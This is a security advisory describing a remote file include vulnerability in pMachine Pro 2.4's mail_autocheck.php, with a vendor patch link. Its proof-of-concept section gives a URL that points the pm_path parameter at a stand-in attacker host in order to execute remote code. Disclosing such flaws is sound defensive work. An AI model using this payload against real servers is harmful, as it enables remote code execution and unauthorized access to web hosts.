PMachine Pro Remote File Include Vulnerability
BID:12597
Info
PMachine Pro Remote File Include Vulnerability
| Bugtraq ID: | 12597 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 19 2005 12:00AM |
| Updated: | Feb 19 2005 12:00AM |
| Credit: | Discovery is credited to kc <[email protected]>. |
| Vulnerable: |
PMachine PMachine Pro 2.4 |
| Not Vulnerable: | |
Discussion
PMachine Pro Remote File Include Vulnerability
PMachine Pro is reported prone to a remote file include vulnerability.
This issue affects the 'mail_autocheck.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well.
PMachine Pro is reported prone to a remote file include vulnerability.
This issue affects the 'mail_autocheck.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.
The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well.
Exploit / POC
PMachine Pro Remote File Include Vulnerability
No exploit is required to leverage this issue.
The following proof of concept example is available:
http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?
No exploit is required to leverage this issue.
The following proof of concept example is available:
http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?
Solution / Fix
PMachine Pro Remote File Include Vulnerability
Solution:
The vendor has released an updated version of the affected 'mail_autocheck.php' file to address this vulnerability:
PMachine PMachine Pro 2.4
Solution:
The vendor has released an updated version of the affected 'mail_autocheck.php' file to address this vulnerability:
PMachine PMachine Pro 2.4
-
PMachine mail_autocheck.zip
http://www.pmachine.com/misc/mail_autocheck.zip
References
PMachine Pro Remote File Include Vulnerability
References:
References:
- Important Security Fix - Build Pro2.4.007 (pMachine)
- pMachine Homepage (pMachine)